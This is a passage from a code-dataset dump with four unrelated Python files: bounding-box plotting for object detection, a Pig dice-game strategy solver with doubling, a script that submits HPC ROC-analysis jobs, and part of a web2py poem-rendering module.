+ ext)\n\n if (i % print_iter) == 0 and verbose:\n print(i+1, \"/\", len(group), \"Processing image:\", img_loc_string)\n print(\" num boxes:\", len(data_all_classes))\n\n xmins = data_all_classes['Xmin_Glob'].values\n ymins = data_all_classes['Ymin_Glob'].values\n xmaxs = data_all_classes['Xmax_Glob'].values\n ymaxs = data_all_classes['Ymax_Glob'].values\n classes = data_all_classes['Category']\n scores = data_all_classes['Prob']\n\n boxes = np.stack((ymins, xmins, ymaxs, xmaxs), axis=1)\n\n plot_rects(image, boxes, scores, classes=classes,\n plot_thresh=plot_thresh, \n color_dict=color_dict, #colormap=colormap,\n outfile=outfile,\n show_labels=show_labels,\n alpha_scaling=alpha_scaling,\n plot_line_thickness=plot_line_thickness,\n verbose=verbose,\n im_root_no_ext=im_root_no_ext)\n '''\n print(\"copying images that detections were lost by appling threshold\")\n # now copy images that were lost when applied detection threshold\n for img in all_valid_img_no_ext:\n image = cv2.imread(os.path.join(valid_img_dir_tot, img), 1)\n\n im_root_no_ext, ext = img.split('.')\n outfile = os.path.join(outdir, im_root_no_ext + '_thresh=' + str(plot_thresh) + '.' + ext)\n\n #if (i % print_iter) == 0 and verbose:\n #print(i + 1, \"/\", len(group), \"Processing image:\", img_loc_string)\n # if verbose:\n #print(\" image.shape:\", image.shape)\n\n plot_rects(image, [], [], classes=[],\n plot_thresh=plot_thresh,\n color_dict=color_dict, # colormap=colormap,\n outfile=outfile,\n show_labels=show_labels,\n alpha_scaling=alpha_scaling,\n plot_line_thickness=plot_line_thickness,\n verbose=verbose,\n im_root_no_ext=im_root_no_ext)\n t1 = time.time()\n print(\"Time to run plot_refined_df():\", t1 - t0, \"s\")\n return outdir\n\n\ndef refine_and_plot_df(df, groupby='Loc_Tmp', label_map_dict={}, sliced=True, groupby_cat='Category',\n outdir='', plot_thresh=0.33, nms_overlap_thresh=0.5,\n show_labels=True, alpha_scaling=True, plot_line_thickness=2,\n out_cols=[u'Loc_Tmp', u'Prob', u'Xmin', u'Ymin', u'Xmax', u'Ymax', u'Category', 'Image_Root'],\n legend_root='colormap.png', plot=True, skip_empty=False, verbose=True):\n # Plot bounding boxes stored in dataframe\n t0 = time.time()\n\n # group by image, and plot\n group = df.groupby(groupby)\n count = 0\n out_list = []\n print_iter = 1\n for i, g in enumerate(group):\n img_loc_string = g[0]\n data_all_classes = g[1] \n \n image_root = data_all_classes['Image_Root'].values[0]\n\n if (i % print_iter) == 0 and verbose:\n print(i+1, \"/\", len(group), \"Processing image:\", img_loc_string)\n print(\"num of boxes:\", len(data_all_classes))\n \n boxes_im, scores_im, classes_im = [], [], []\n # group by category as well so that detections can be overlapping\n group2 = data_all_classes.groupby(groupby_cat)\n for j, g2 in enumerate(group2):\n class_str = g2[0]\n data = g2[1] \n #classes_str = np.array(len(data) * [class_str])\n scores = data['Prob'].values\n\n if (i % print_iter) == 0 and verbose: \n print(\"Category:\", class_str)\n print(\"num boxes:\", len(data))\n \n if not sliced: \n xmins = data['Xmin'].values\n ymins = data['Ymin'].values\n xmaxs = data['Xmax'].values\n ymaxs = data['Ymax'].values\n else:\n xmins = data['Xmin_Glob'].values\n ymins = data['Ymin_Glob'].values\n xmaxs = data['Xmax_Glob'].values\n ymaxs = data['Ymax_Glob'].values\n \n # filter out low probs\n high_prob_ids = np.where(scores >= plot_thresh)\n scores = scores[high_prob_ids]\n #classes_str = classes_str[high_prob_ids]\n xmins = xmins[high_prob_ids]\n xmaxs = xmaxs[high_prob_ids]\n ymins = 
ymins[high_prob_ids]\n            ymaxs = ymaxs[high_prob_ids]\n            probs = scores[high_prob_ids]\n            \n            boxes = np.stack((ymins, xmins, ymaxs, xmaxs), axis=1)\n            \n            if verbose:\n                print(\"len boxes:\", len(boxes))\n\n            # NMS\n            if nms_overlap_thresh > 0:\n                # Try nms with pyimagesearch algorithm\n                # assume boxes = [[xmin, ymin, xmax, ymax, ...\n                # might want to split by class because we could have a car inside\n                # the bounding box of a plane, for example\n                boxes_nms_input = np.stack((xmins, ymins, xmaxs, ymaxs), axis=1)\n                _, _, good_ids = non_max_suppression(boxes_nms_input, probs, overlapThresh=nms_overlap_thresh)\n                if verbose:\n                    print(\"num boxes_all:\", len(xmins))\n                    print(\"num good_ids:\", len(good_ids))\n                boxes = boxes[good_ids]\n                scores = scores[good_ids]\n                #classes = classes_str[good_ids]\n            \n            # create output\n            #refine_dic[img_loc_string] = [scores, boxes, classes]\n            \n            # add to output list\n            for score, box in zip(scores, boxes):\n                x0, y0, x1, y1 = box\n                out_list.append([img_loc_string, score, x0, y0, x1, y1, class_str, image_root])\n            \n            classes_str = np.array(len(scores) * [class_str])\n            image_roots = np.array(len(scores) * [image_root])\n            \n            # add to image values\n            classes_im.extend(classes_str)\n            boxes_im.extend(boxes)\n            scores_im.extend(scores)\n\n        if plot:\n            # get colormap, if plotting\n            outfile_legend = os.path.join(outdir, legend_root)\n            colormap, color_dict = init_colors_legend(outfile_legend, label_map_dict)\n\n            image = cv2.imread(img_loc_string, 1)\n            if verbose:\n                print(\"image.shape:\", image.shape)\n\n            if skip_empty:\n                z = np.where(scores_im >= plot_thresh)\n                if len(z[0]) == 0:\n                    print(\"Empty image, skip plotting\")\n                    return\n\n            im_root = os.path.basename(img_loc_string)\n            im_root_no_ext, ext = im_root.split('.')\n            outfile = os.path.join(outdir, im_root_no_ext + '_thresh=' + str(plot_thresh) + '.' 
+ ext)\n count += len(boxes_im)\n if verbose:\n print(\"outfile:\", outfile)\n \n plot_rects(image, boxes_im, scores_im, classes=classes_im,\n plot_thresh=plot_thresh,\n color_dict=color_dict,\n outfile=outfile,\n show_labels=show_labels,\n alpha_scaling=alpha_scaling,\n plot_line_thickness=plot_line_thickness,\n skip_empty=skip_empty,\n verbose=verbose,\n im_root_no_ext=im_root_no_ext)\n\n # create dataframe\n df_out = pd.DataFrame(out_list, columns=out_cols)\n print(\"Time to run refine_and_plot_df():\", time.time() - t0, \"seconds\")\n return df_out\n\n\ndef init_colors_legend(outfile, label_map_dict, auto_assign_colors=True,\n verbose=False):\n \"\"\"Create and save color legend as image\"\"\"\n if auto_assign_colors:\n # automatically assign colors\n cmap = plt.cm.get_cmap('jet', len(list(label_map_dict.keys())))\n colormap = []\n color_dict = {}\n index = min(label_map_dict) # fix as TensorFlow indexes start from 1\n for i in range(cmap.N):\n rgb = cmap(i)[:3]\n rgb_tuple = tuple([int(255*z) for z in rgb])\n colormap.append(rgb_tuple)\n color_dict[label_map_dict[index]] = rgb_tuple\n index = index + 1\n else:\n colormap = [(255, 0, 0),\n (0, 255, 0),\n (0, 0, 255),\n (255, 255, 0),\n (0, 255, 255),\n (255, 0, 255),\n (0, 0, 255),\n (127, 255, 212),\n (72, 61, 139),\n (255, 127, 80),\n (199, 21, 133),\n (255, 140, 0),\n (0, 165, 255)]\n\n # colors are bgr not rgb https://www.webucator.com/blog/2015/03/python-color-constants-module/\n color_dict = {\n 'small': (255, 0, 0),\n 'pickup': (0, 255, 0),\n 'truck': (0, 0, 255),\n 'van': (255, 255, 0),\n 'bus': (0, 255, 255),\n }\n\n h, w = 800, 400\n xpos = int(0.2*w)\n ydiff = int(0.05*h) \n # LABELS TEXT FONT\n # https://codeyarns.files.wordpress.com/2015/03/20150311_opencv_fonts.png\n font = cv2.FONT_HERSHEY_TRIPLEX # FONT_HERSHEY_SIMPLEX # https://codeyarns.com/2015/03/11/fonts-in-opencv/\n font_size = 0.5\n label_font_width = 1\n\n # rescale height so that if we have a long list of categories it fits \n rescale_h = h * len(label_map_dict.keys()) / 18.\n hprime = max(h, int(rescale_h))\n img_mpl = 255*np.ones((hprime, w, 3))\n\n cv2.putText(img_mpl, 'Color Legend', (int(xpos), int(ydiff)), font, 1.5*font_size, (0, 0, 0),\n int(1.5*label_font_width), cv2.LINE_AA)\n\n for key in label_map_dict.keys():\n itmp = key\n val = label_map_dict[key]\n color = color_dict[val]\n \n text = '- ' + str(key) + ': ' + str(label_map_dict[key])\n ypos = 2 * ydiff + itmp * ydiff\n try:\n cv2.putText(img_mpl, text, (int(xpos), int(ypos)), font, \n 1.5*font_size, color, label_font_width, cv2.LINE_AA)\n except:\n cv2.putText(img_mpl, text, (int(xpos), int(ypos)), font,\n 1.5*font_size, color, label_font_width, cv2.LINE_AA)\n \n cv2.imwrite(outfile, img_mpl)\n if verbose:\n print(\"label_map_dict:\", label_map_dict)\n print(\"colormap:\", colormap)\n print(\"color_dict:\", color_dict)\n return colormap, color_dict\n\n\n#@profile\ndef plot_rects(im, boxes, scores, classes=[], outfile='', plot_thresh=0.3,\n color_dict={}, plot_line_thickness=3, show_labels=True,\n label_alpha_scale=0.85, compression_level=6,\n alpha_scaling=True, skip_empty=False, verbose=False, super_verbose=False, im_root_no_ext=\"notReceived\"):\n \"\"\"Plot boxes in image\n if alpha_scaling, scale box opacity with probability\n if show_labels, plot the label above each box\n extremely slow if alpha_scaling = True\n \"\"\"\n start = time.time()\n\n # label settings\n font = cv2.FONT_HERSHEY_SIMPLEX\n font_size = 0.2\n font_width = 1\n display_str_height = 3\n\n\n if verbose:\n 
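# color_dict maps each category name to a BGR color tuple (built by init_colors_legend above)\n        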
print(\"color_dict:\", color_dict)\n output = im\n h, w = im.shape[:2]\n nboxes = 0\n \n # scale alpha with prob can be extremely slow since we're overlaying a\n # a fresh image for each box, need to bin boxes and then plot. Instead,\n # bin the scores, then plot\n\n # if alpha scaling, bin by scores\n if alpha_scaling:\n # if alpha scaling, bin by scores\n if verbose:\n print(\"Binning scores in plot_rects()...\")\n # https://docs.scipy.org/doc/numpy/reference/generated/numpy.digitize.html\n bins = np.linspace(0, 1, 11) # define a step of 0.1 between 0 and 1\n inds = np.digitize(scores, bins) # bin that each element belongs to\n unique_inds = np.sort(np.unique(inds))\n for bin_ind in unique_inds:\n alpha_val = bins[bin_ind]\n boxes_bin = boxes[bin_ind == inds]\n scores_bin = scores[bin_ind == inds]\n classes_bin = classes[bin_ind == inds]\n \n # define overlay alpha\n # rescale to be between 0.3 and 1 (alpha_val starts at 0.1)\n alpha = 0.2 + 0.8*alpha_val\n overlay = np.zeros(im.shape).astype(np.uint8)\n\n # make labels a bit dimmer\n alpha_prime = max(0.25, label_alpha_scale * alpha)\n overlay1 = np.zeros(im.shape).astype(np.uint8)\n\n for box, score, classy in zip(boxes_bin, scores_bin, classes_bin):\n if score >= plot_thresh:\n nboxes += 1\n [ymin, xmin, ymax, xmax] = box\n left, right, top, bottom = xmin, xmax, ymin, ymax\n \n # check boxes\n if (left < 0) or (right > (w-1)) or (top < 0) or (bottom > (h-1)):\n print(\"box coords out of bounds: \", left, right, top, bottom)\n return\n \n if (right < left) or (bottom < top):\n print(\"box coords wrong: \", left, right, top, bottom)\n return\n\n # get label and color\n color = color_dict[classy]\n\n # add rectangle to overlay\n cv2.rectangle(overlay, (int(left), int(bottom)), (int(right), int(top)), color, plot_line_thickness,\n lineType=1)\n\n if show_labels:\n # get location\n display_str = str(classy) + ': ' + str(int(100 * float(score))) + '%'\n # If the total height of the display strings added to the top of the bounding\n # box exceeds the top of the image, stack the strings below the bounding box\n # instead of above.\n #display_str_heights = [font.getsize(ds)[1] for ds in display_str_list]\n # Each display_str has a top and bottom margin of 0.05x.\n total_display_str_height = (1 + 2 * 0.05) * display_str_height\n if top > total_display_str_height:\n text_bottom = top\n else:\n text_bottom = bottom + total_display_str_height\n # Reverse list and print from bottom to top.\n (text_width, text_height), _ = cv2.getTextSize(display_str, \n fontFace=font,\n fontScale=font_size,\n thickness=font_width)\n margin = np.ceil(0.1 * text_height)\n \n # get rect and text coords,\n rect_top_left = (int(left - (plot_line_thickness - 1) * margin), \n int(text_bottom - text_height - (plot_line_thickness + 3) * margin))\n rect_bottom_right = (int(left + text_width + margin), \n int(text_bottom - (plot_line_thickness * margin)))\n text_loc = (int(left + margin), int(text_bottom - (plot_line_thickness + 2) * margin))\n\n # plot\n # if desired, make labels a bit dimmer \n cv2.rectangle(overlay1, rect_top_left, rect_bottom_right, color, -1)\n cv2.putText(overlay1, display_str, text_loc, font, font_size, (0, 0, 0), font_width,\n #cv2.CV_AA)\n cv2.LINE_AA)\n # for the bin, combine overlay and original image \n overlay_alpha = (alpha * overlay).astype(np.uint8)\n\n # masks, https://docs.opencv.org/3.1.0/d0/d86/tutorial_py_image_arithmetics.html\n overlay_gray = cv2.cvtColor(overlay, cv2.COLOR_BGR2GRAY)\n yup = np.nonzero(overlay_gray)\n output_tmp = 
output.astype(float)\n            output_tmp[yup] *= (1.0 - alpha)\n            output = cv2.add(output_tmp.astype(np.uint8), overlay_alpha)\n            \n            # add labels, if desired\n            if show_labels:\n                overlay_alpha1 = (alpha_prime * overlay1).astype(np.uint8)\n                overlay_gray1 = cv2.cvtColor(overlay1, cv2.COLOR_BGR2GRAY)\n                yup = np.nonzero(overlay_gray1)\n                output_tmp = output.astype(float)\n                output_tmp[yup] *= (1.0 - alpha_prime)\n                output = cv2.add(output_tmp.astype(np.uint8), overlay_alpha1)\n\n        end = time.time()\n        print(str(end - start) + \" plot end\")\n    # no alpha scaling\n    else:\n        \n        for box, score, classy in zip(boxes, scores, classes):\n            \n            if score >= plot_thresh:\n                nboxes += 1\n                [ymin, xmin, ymax, xmax] = box\n                left, right, top, bottom = xmin, xmax, ymin, ymax\n\n                # area = (xmax - xmin) * (ymax - ymin)\n                # get color\n                color = color_dict[classy]\n                \n                if verbose:\n                    print(\"  left, right, top, bottom:\", left, right, top, bottom)\n                    print(\"  class:\", classy)\n                    print(\"  score:\", score)\n                \n                # add rectangle\n                cv2.rectangle(output, (int(left), int(bottom)), (int(right), int(top)), color, plot_line_thickness)\n                \n                # plot categories too?\n                if show_labels:\n                    # adapted from visualization_utils.py\n                    # get location\n                    display_str = str(classy) + ': ' + str(int(100 * float(score))) + '%' # + str(int(area))\n                    # If the total height of the display strings added to the top of the bounding\n                    # box exceeds the top of the image, stack the strings below the bounding box\n                    # instead of above.\n                    #display_str_heights = [font.getsize(ds)[1] for ds in display_str_list]\n                    # Each display_str has a top and bottom margin of 0.05x.\n                    total_display_str_height = (1 + 2 * 0.05) * display_str_height\n                    if top > total_display_str_height:\n                        text_bottom = top\n                    else:\n                        text_bottom = bottom + total_display_str_height\n                    # Reverse list and print from bottom to top.\n                    (text_width, text_height), _ = cv2.getTextSize(display_str, \n                                                                   fontFace=font,\n                                                                   fontScale=font_size,\n                                                                   thickness=font_width) #5, 5#font.getsize(display_str)\n                    margin = np.ceil(0.1 * text_height)\n                    \n                    # get rect and text coords,\n                    rect_top_left = (int(left - (plot_line_thickness - 1) * margin),\n                                     int(text_bottom - text_height - (plot_line_thickness + 3) * margin))\n                    rect_bottom_right = (int(left + text_width + margin), int(text_bottom - (plot_line_thickness * margin)))\n                    text_loc = (int(left + margin), \n                                int(text_bottom - (plot_line_thickness + 2) * margin))\n                    \n                    # annoying notch between label box and bounding box, \n                    # caused by rounded lines, so if\n                    # alpha is high, move everything down a smidge\n                    rect_top_left = (rect_top_left[0], int(rect_top_left[1] + margin))\n                    rect_bottom_right = (rect_bottom_right[0], int(rect_bottom_right[1] + margin))\n                    text_loc = (text_loc[0], int(text_loc[1] + margin))\n\n                    cv2.rectangle(output, rect_top_left, rect_bottom_right, color, -1)\n                    cv2.putText(output, display_str, text_loc, font, font_size, (0, 0, 0), font_width, cv2.LINE_AA)\n\n    if skip_empty and nboxes == 0:\n        return\n    else:\n        cv2.imwrite(outfile, output, [cv2.IMWRITE_PNG_COMPRESSION, 9])\n        # for JPEG , [cv2.IMWRITE_JPEG_QUALITY, 40]\n        # for PNG , [cv2.IMWRITE_PNG_COMPRESSION, compression_level])\n\n        # check if txt output folder exists:\n        directory = os.path.dirname(outfile) + \"/\" + \"txt_\" + str(plot_thresh)\n        if not os.path.exists(directory):\n            os.makedirs(directory)\n\n        outfiletxt = directory + \"/\" + im_root_no_ext + \".txt\" # save txt files to txt folder\n        output_txt = []\n        for box, score, classy in zip(boxes, scores, classes):\n            if score >= plot_thresh:\n                nboxes += 1\n                [ymin, xmin, ymax, xmax] 
= box\n output_txt.append([classy, score, xmin, ymin, xmax, ymax])\n with open(outfiletxt, \"w\") as f:\n writer = csv.writer(f, delimiter=' ')\n writer.writerows(output_txt)\n return\n","sub_path":"myscripts/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":48741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"274242187","text":"import random\nfrom functools import update_wrapper\n\n\ndef decorator(decor):\n \"\"\"Update the wrapper of decor(function), where decor is a decorator function.\n\n Returns a reference to the function object update_wrapper()\n \"\"\"\n def _decor(function):\n return update_wrapper(decor(function), function)\n\n update_wrapper(_decor, decor)\n return _decor\n\n\n@decorator\ndef memo(function):\n \"\"\"Decorator that caches the return value for each call to function(*args).\"\"\"\n def _function(*args):\n try:\n return cache[args]\n # not in cache\n except KeyError:\n cache[args] = function(*args)\n return cache[args]\n # args is not hashable\n except TypeError:\n return function(*args)\n\n return _function\n\n\ndef fair_die_rolls():\n \"\"\"Iterator that generates random die rolls.\"\"\"\n while True:\n yield random.randint(1, 6)\n\n\ndef play_pig_d(A, B, dierolls=fair_die_rolls()):\n \"\"\"Play a game of pig between two players, represented by their strategies.\n\n Each time through the main loop we ask the current player for one decision,\n which must be 'hold' or 'roll', and we update the state accordingly.\n When one player's score exceeds the goal, return that player.\n\n At any point in the game, a player (let's say player A) can offer to 'double' the game.\n Player B then has to decide to 'accept', in which case the game is played through as normal,\n but it is now worth two points, or 'decline,' in which case player B immediately loses and\n player A wins one point.\n \"\"\"\n strategies = [A, B]\n state = (0, 0, 0, 0, 1)\n other = {1: 0, 0: 1}\n while True:\n (p, me, you, pending, double) = state\n if me >= goal:\n return strategies[p], double\n elif you >= goal:\n return strategies[other[p]], double\n else:\n action = strategies[p](state)\n state = do(action, state, dierolls)\n\n\ndef do(action, state, dierolls):\n \"\"\"Return the state that results from doing action in state.\n\n If action is not legal, return a state where the opponent wins.\n Can use dierolls if needed.\n \"\"\"\n (p, me, you, pending, double) = state\n other = {1: 0, 0: 1}\n if action not in pig_actions_d(state):\n return (other[p], goal, 0, 0, double)\n elif action == 'roll':\n d = next(dierolls)\n if d == 1:\n return (other[p], you, me + 1, 0, double) # pig out; other player's turn\n else:\n return (p, me, you, pending + d, double) # accumulate die in pending\n elif action == 'hold':\n return (other[p], you, me + pending, 0, double)\n elif action == 'double':\n return (other[p], you, me, pending, 'double')\n elif action == 'decline':\n return (other[p], goal, 0, 0, 1)\n elif action == 'accept':\n return (other[p], you, me, pending, 2)\n\n\ndef pig_actions_d(state):\n \"\"\"Take a state (p, me, you, pending, double), as input and return all legal actions.\n\n double can be either: 1, 2 or 'double'\n - 1 or 2 denote the value of the game\n - 'double' is reserved for the moment at which one player has doubled and is waiting\n for the other to accept or decline\n\n An action is one of [\"roll\", \"hold\", \"accept\", decline\", \"double\"]\n - If double is \"double\", can only \"accept\" or \"decline\"\n - If 
double is 1, can \"double\" (in addition to other moves). If double > 1, cannot \"double\"\n - Can't \"hold\" if pending is 0\n \"\"\"\n (p, me, you, pending, double) = state\n if double == 'double':\n return ['accept', 'decline']\n actions = ['roll']\n if double == 1:\n actions.append('double')\n if pending > 0:\n actions.append('hold')\n return actions\n\n\ndef strategy_compare(first_strategy, second_strategy, trials=1000):\n \"\"\"Takes two strategies, A and B, as input and returns the percentage of points won by strategy A.\"\"\"\n first_points, second_points = 0, 0\n for i in range(trials):\n if i % 2 == 0: # take turns with who goes first\n winner, points = play_pig_d(first_strategy, second_strategy)\n else:\n winner, points = play_pig_d(second_strategy, first_strategy)\n if winner.__name__ == first_strategy.__name__:\n first_points += points\n else:\n second_points += points\n percent = 100 * first_points / float(first_points + second_points)\n print('For goal = %d and number of trials = %d, strategy %s took %s percent of the points against %s.' %\n (goal, trials, first_strategy.__name__, percent, second_strategy.__name__))\n return percent\n\n\ndef clueless_d(state):\n \"\"\"A strategy that ignores the state and chooses at random from possible moves.\"\"\"\n return random.choice(pig_actions_d(state))\n\n\ndef hold_20_d(state):\n \"\"\"A strategy that holds at 20 pending. Always accept; never double.\"\"\"\n (p, me, you, pending, double) = state\n return ('accept' if double == 'double' else\n 'hold' if (pending >= 20 or me + pending >= goal) else\n 'roll')\n\n\ndef strategy_d(state):\n \"\"\"The optimal pig strategy; chooses the action with the highest expectation of points to win.\"\"\"\n return best_action(state, pig_actions_d, pig_action_utility, pig_utility)\n\n\ndef best_action(state, actions, action_utility, utility):\n \"\"\"Return the optimal action for a given state.\n\n - actions is a function that returns the legal actions from the given state\n - action_utility is a function that returns the expected utility (value) of the next state for the\n optimal player. 
The next state depends on the specified action\n - utility is a function that returns the expected utility (value) of a state for the optimal player\n \"\"\"\n def expected_utility(action):\n return action_utility(state, action, utility)\n\n return max(actions(state), key=expected_utility)\n\n\ndef pig_action_utility(state, action, utility):\n \"\"\"The expected value of choosing action in state.Assumes opponent also plays with optimal strategy.\n\n An action is one of [\"roll\", \"hold\", \"accept\", decline\", \"double\"]\n \"\"\"\n if action == 'roll':\n one = iter([1])\n rest = iter([2, 3, 4, 5, 6])\n return (-utility(do(action, state, one)) + sum(utility(do(action, state, rest)) for _ in range(5))) / 6.0\n else:\n return -utility(do(action, state, fair_die_rolls()))\n\n\n@memo\ndef pig_utility(state):\n \"\"\"Return the expected utility (value) of the specified state for an optimal player.\"\"\"\n (p, me, you, pending, double) = state\n if double == 'double':\n return max(pig_action_utility(state, action, pig_utility) for action in pig_actions_d(state))\n if me + pending >= goal:\n return double\n elif you >= goal:\n return -double\n else:\n return max(pig_action_utility(state, action, pig_utility) for action in pig_actions_d(state))\n\n\ndef test():\n assert set(pig_actions_d((0, 2, 3, 0, 1))) == {'roll', 'double'}\n assert set(pig_actions_d((1, 20, 30, 5, 2))) == {'hold', 'roll'}\n assert set(pig_actions_d((0, 5, 5, 5, 1))) == {'roll', 'hold', 'double'}\n assert set(pig_actions_d((1, 10, 15, 6, 'double'))) == {'accept', 'decline'}\n assert strategy_compare(strategy_d, hold_20_d, trials=10000) > 60 # must win 60% of the points\n return 'test passes'\n\n\n# goal = 40\n# print(test())\n\nfor goal in range(35, 46):\n cache = {}\n strategy_compare(strategy_d, hold_20_d, trials=10000)","sub_path":"src/DoublingPig.py","file_name":"DoublingPig.py","file_ext":"py","file_size_in_byte":7481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"499416720","text":"\n# Import\nimport os\nimport sys\nfrom glob import glob\n\n# Cell Loop\ncellList = [\"H1hesc\", \"K562\"]\ncellList = [\"K562\"]\nfor cell in cellList:\n\n # Factor Loop\n rl = \"/hpcwork/izkf/projects/TfbsPrediction/Results/Footprints/ROC_SBTC/\"+cell+\"/\"\n tfList = [e.split(\"/\")[-1].split(\"_\")[0] for e in glob(rl+\"*_roc.txt\")]\n tfList = [\"MEF2A\"]\n for tf in tfList:\n\n # Parameters\n ml=\"/hpcwork/izkf/projects/TfbsPrediction/Results/MPBSAWG/\"+cell+\"_Evidence/\"\n pl=\"/hpcwork/izkf/projects/TfbsPrediction/Results/Footprints/Results/\"+cell+\"/\"\n outputLocation = \"/hpcwork/izkf/projects/TfbsPrediction/Results/Footprints/ROC_NM3/\"+cell+\"/\"\n os.system(\"mkdir -p \"+outputLocation)\n mpbsName = tf\n inList = 
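
# For reference, the 'roll' branch of pig_action_utility averages six equally
# likely outcomes: one pig-out (d == 1, negated because the turn passes) plus
# the five continuations d = 2..6. The same expectation, stated standalone with
# a toy utility so the arithmetic is visible:
def expected_roll_value(pending, utility):
    pig_out = -utility(0)  # d == 1: pending is lost and the opponent moves
    keep_rolling = sum(utility(pending + d) for d in range(2, 7))
    return (pig_out + keep_rolling) / 6.0

assert expected_roll_value(10, lambda p: p) == (12 + 13 + 14 + 15 + 16) / 6.0
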
[\nml+\"fdr_4.bed\",\npl+\"Boyle_DU.bed\",\npl+\"Centipede_80.bed\",\npl+\"Centipede_85.bed\",\npl+\"Centipede_90.bed\",\npl+\"Centipede_95.bed\",\npl+\"Centipede_99.bed\",\npl+\"Cuellar_80.bed\",\npl+\"Cuellar_85.bed\",\npl+\"Cuellar_90.bed\",\npl+\"Cuellar_95.bed\",\npl+\"Cuellar_99.bed\",\npl+\"Dnase2Tf_DU.bed\",\npl+\"Dnase2Tf_rank.bed\",\npl+\"FLR_80.bed\",\npl+\"FLR_85.bed\",\npl+\"FLR_90.bed\",\npl+\"FLR_95.bed\",\npl+\"FLR_99.bed\",\npl+\"FS_DU.bed\",\npl+\"HINT-BC_D_DU.bed\",\npl+\"HINT-BCN_D_DU.bed\",\npl+\"HINT_D_DU.bed\",\npl+\"Neph_DU.bed\",\npl+\"PIQ_80.bed\",\npl+\"PIQ_85.bed\",\npl+\"PIQ_90.bed\",\npl+\"PIQ_95.bed\",\npl+\"PIQ_99.bed\",\npl+\"TC_DU.bed\",\npl+\"Wellington_DU.bed\",\npl+\"Wellington_rank.bed\",\npl+\"Protection_DU.bed\",\npl+\"BinDNase_80.bed\",\npl+\"BinDNase_85.bed\",\npl+\"BinDNase_90.bed\",\npl+\"BinDNase_95.bed\",\npl+\"BinDNase_99.bed\",\npl+\"BinDNase_rank.bed\"\n]\n bedList = \",\".join(inList)\n typeList = \",\".join([\"SC\" if \"Cuellar\" in e or \"FS\" in e or \"TC\" in e or \"fdr\" in e or \"Protection\" in e else \"SB\" for e in inList])\n labelList = \",\".join([\"PWM\"]+[e.split(\"/\")[-1].split(\".\")[0] for e in inList[1:]])\n\n # Execution\n myL = \"_\".join([cell,tf,\"ROC\"])\n clusterCommand = \"bsub \"\n clusterCommand += \"-J \"+myL+\" -o \"+myL+\"_out.txt -e \"+myL+\"_err.txt \"\n clusterCommand += \"-W 100:00 -M 60000 -S 100 -P izkf -R \\\"select[hpcwork]\\\" ./rocFromBedSBSC_pipeline.zsh \"\n clusterCommand += mpbsName+\" \"+typeList+\" \"+labelList+\" \"+bedList+\" \"+outputLocation\n os.system(clusterCommand)\n # \n\n","sub_path":"Code/Graphics/Pipeline/rocFromBedSBSC_call.py","file_name":"rocFromBedSBSC_call.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"490793427","text":"import logging\nfrom gluon import A\nfrom gluon import DIV\nfrom gluon import H3\nfrom gluon import H4\nfrom gluon import H5\nfrom gluon import I\nfrom gluon import IS_IN_SET\nfrom gluon import LI\nfrom gluon import P\nfrom gluon import MARKMIN\nfrom gluon import SQLFORM\nfrom gluon import SPAN\nfrom gluon import TAG\nfrom gluon import UL\nfrom gluon import URL \nfrom gluon import XML\nfrom gluon import xmlescape\n\n\ndate_format = '%B %Y'\nindex_class = 'col-xs-12 col-sm-6 col-md-4'\npoem_class = 'col-xs-12 col-sm-10 col-md-8'\n\ndef _thumb(row, cls, title=None):\n \"\"\" Return a column DIV thumbnail. \"\"\"\n caption = DIV(\n H3(row.chapter.title),\n H4('Chapter %i' % row.chapter.number),\n H5(row.published.strftime(date_format)),\n H3(row.intro_hanzi),\n H4(row.intro_en),\n _class='caption',\n _role='button',\n _title=title)\n anchor = A(\n caption,\n _class='ddj-thumbnail',\n _href=URL('poems', 'chapter', args=[row.chapter.number]))\n thumbnail = DIV(anchor, _class='thumbnail')\n return DIV(thumbnail, _class=cls)\n\ndef chapter(poem, db, uhdb):\n \"\"\" Return a bootstrap row for a poem row. \"\"\"\n if not poem:\n raise Exception('No such poem')\n qry = ((db.verse.book==1) & (db.verse.chapter==poem.chapter))\n verse = db(qry).select().first()\n title = H3(poem.chapter.title)\n subtitle = H4('Chapter %i' % poem.chapter.number)\n published = H5(poem.published.strftime(date_format))\n stanzas = verse.en.split('\\r\\n\\r\\n')\n content = []\n for stanza in stanzas:\n content.append(P(XML(stanza.replace('\\r\\n', '
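
# The loop above submits jobs by formatting one long string for os.system. An
# equivalent sketch with subprocess.run, which surfaces the exit status and
# sidesteps shell-quoting of each flag (this submit() wrapper is hypothetical,
# mirroring the bsub options built above):
import subprocess

def submit(job_name, *bsub_args):
    cmd = ["bsub", "-J", job_name, "-o", job_name + "_out.txt",
           "-e", job_name + "_err.txt"] + list(bsub_args)
    result = subprocess.run(cmd)
    if result.returncode != 0:
        print("submission failed for " + job_name)
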
'))))\n link = P(\n A(\n I('Go to the study version'),\n _href=URL('studies', 'chapter', args=[poem.chapter.number]),\n _style='color:inherit;',\n _title='Study version'),\n _style='font-size:0.9em;padding-top:1em')\n content.append(P(link))\n column = DIV(title, subtitle, published, *content, _class=poem_class)\n return DIV(\n column, _class='row',\n _style='font-size:1.12em;white-space:nowrap;')\n\ndef chapter_range(page_number):\n if page_number >= 1 and page_number <= 9:\n low = ((page_number-1)*9)+1\n high = page_number*9\n else:\n raise Exception('No such page')\n return low, high\n\ndef decache(chapter, db):\n \"\"\" Clear study chapter cache data. \"\"\"\n import studies\n from gluon import current\n\n # Decache the associated study.\n studies.decache(chapter, db)\n\n # Decache the poem itself.\n current.cache.ram('poem-%d' % chapter, None)\n\n # Decache links in the next poem.\n qry = db.poem.chapter > int(chapter)\n nxt = db(qry).select(limitby=(0,1), orderby=db.poem.chapter)\n if nxt:\n current.cache.ram('links-%d' % nxt.first().chapter, None)\n\n # Decache links in the previous poem.\n qry = db.poem.chapter < chapter\n prev = db(qry).select(limitby=(0,1), orderby=~db.poem.chapter)\n if prev:\n current.cache.ram('links-%d' % prev.first().chapter, None)\n\n # Decache the page containing the poem.\n page = (chapter + 8) / 9\n current.cache.ram('poems-%d' % page, None)\n\ndef grid(db, deletable=False):\n \"\"\" Return an SQLFORM.grid to manage poems. \"\"\"\n\n createargs = editargs = viewargs = {\n 'fields': [\n 'chapter', 'published', 